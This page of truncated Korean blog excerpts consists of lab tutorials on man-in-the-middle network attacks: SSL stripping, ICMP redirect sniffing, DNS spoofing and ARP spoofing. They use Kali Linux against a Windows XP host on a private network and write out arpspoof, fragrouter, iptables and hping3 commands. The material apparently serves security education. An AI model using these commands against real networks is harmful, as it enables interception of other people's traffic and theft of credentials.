Simple is IT, 누구나 보고 누구나 깨닫는 IT

SSL ? : 전송계층의 보안 프로토콜이다. (HTTP 통신을 암호화하는데 사용) SSL Strip : MITM 공격을 수행하고 있을 때 Hacker - Target = http 통신, Web - Hacker = https 통신하며 접속 허용, 비정상 통신 수행 Hacker 192.168.10.6 (Kali Linux) Target 192.168.10.8 (Windows XP) Gateway 192.168.10.2 Hacker # arpspoof -t 192.168.10.2 192.168.10.8 # arpspoof -t 192.168.10.8 192.168.10.2 # fragrouter -B1 # apt-get install iptables -y # iptables -t nat -A PREROUTIN..

ICMP Redirect Sniffing- ICMP Type 5(Redirect)를 이용해 타깃의 라우팅 테이블에 특정 라우팅 정보를 수정 또는 추가 ICMP 헤더 ​ Hacker 192.168.10.6 (Kali Linux) Target 192.168.10.8 (Windows XP) 공격 전 Target의 라우팅 테이블 ​Hacker# apt-get install hping3 -y​hping3의 icmp redirect 옵션 예시-> hping3 -1 --icmptype 5 --icmpcode 1 -a [기존 GW] --icmp-ipdst [Target 목적지] --icmp-gw [목적지의 GW] --icmp-ipsrc [Target] [Target]​명령 WireShark ​​​Target 공격 후 ..

Hacker 192.168.10.6 ( Kali Linux ) Target 192.168.10.8 ( Windows XP ) GW 192.168.10.2 Tool dsniff DNS Spoofing 실행 전 Target ​ arp table ​ web connect ​ ​ ​ ​ ---- Hacker ​ 1. ARP Spoofing - Target의 ARP 테이블에 Gateway MAC을 Hacker MAC으로 스푸핑 -> arpspoof -t 192.168.10.6 192.168.10.2 ​ ​ - Gateway ARP 테이블에 Target MAC을 Hacker MAC으로 스푸핑 -> arpspoof -t 192.168.10.2 192.168.10.6 ​ ​ 2. dns spoof 위한 파일 생성 ->..

ARP Spoofing: ARP 응답 프로토콜 상의 출발지 IP주소를 GW주소로 설정하고 출발지 MAC주소는 공격자의 주소로 변경해 패킷을 전달​ 공격 전 정상 통신 공격 후 통신 ​Sniffing - 상대방의 네트워크 패킷을 훔쳐보는 공격 ​ Hacker 192.168.10.6/24 (Kali Linux) Target 192.168.10.8/24 (Windows XP) ARP Spoofing의 기본 ​ apt-get install dsniff -y ​ # arpspoof -t [Target IP] [조작하고픈 IP] ​ ​ Target 공격 전 ​ 공격 후 ​ dsniff (각종 스니핑 기법들을 위한 자동화 도구) filesnarf : nfs를 이용해 파일을 접근 또는 저장할 때 해당 파일을 해커의 디..